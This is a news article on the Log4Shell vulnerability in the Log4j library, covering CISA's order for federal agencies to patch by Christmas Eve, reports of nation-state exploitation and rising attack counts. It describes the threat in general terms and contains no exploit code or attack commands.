In what’s turning out to be one of the worst security flaws ever discovered, CISA (Cybersecurity and Infrastructure Agency) has issued an order to federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas eve. The agency has added the vulnerability to its catalogue of actively-exploited vulnerabilities along with 12 other security flaws.
The vulnerability was first reported on November 24 by Alibaba’s Cloud Security team. The first proof-of-concept was published on Github on December 9, and the vulnerability has been exploited quite actively since then.
Federal agencies have ten days to test what internal apps and servers use the impacted Log4j library, check if they’re vulnerable and deploy patches by December 24 according to a definite timeline provided in the catalogue.
The CISA has also launched a webpage guiding the US public and private sectors over the vulnerability. Additionally, security researcher Royce Williams already has a list of over 300 vendors checking who is and isn’t impacted by the vulnerability. The Dutch National Cyber Security Center manages another such list.
Log4J vulnerability keeps escalating
Patches have been available for the log4J library, and the Apache Foundation has released an official update for the library fixing the vulnerability. However, the sheer scale at which the library is implemented means that testing for vulnerabilities and deploying patches won’t be an easy task.
Even though the vulnerability was reported in the past few days, it’s already considered one of the worst security flaws ever discovered due to its widespread use in enterprise software developers and ease of exploitation. Also, the fact that it can hijack entire systems.
Both Microsoft and Mandiant have reported that attackers from China are actively looking to exploit the vulnerability. In an update, Microsoft added that attackers from North Korea, Iran and Turkey are also using the attack.
Phosphorus, a threat actor from Iran, and Hafnium from China have actively experimented with the flaw.
The number of attacks has been rising significantly as well. Checkpoint reported that the number of attacks had reached over 40,000 by Saturday, 200,000 by Sunday and 800,000 by Monday — targeting nearly half of corporate networks since the cyberattacks exploiting the vulnerability began.
The vulnerability is already being massively abused by malware and botnet operators, with ransomware gangs expected to join in soon.
Lunasec reports that attacks are getting more sophisticated as they’re bypassing WAFs and getting past the first line of defence. Even more so, the cybersecurity firm also notes that the situation can be worse as another vulnerability could come up, which can undo whatever mitigations users might’ve put into place.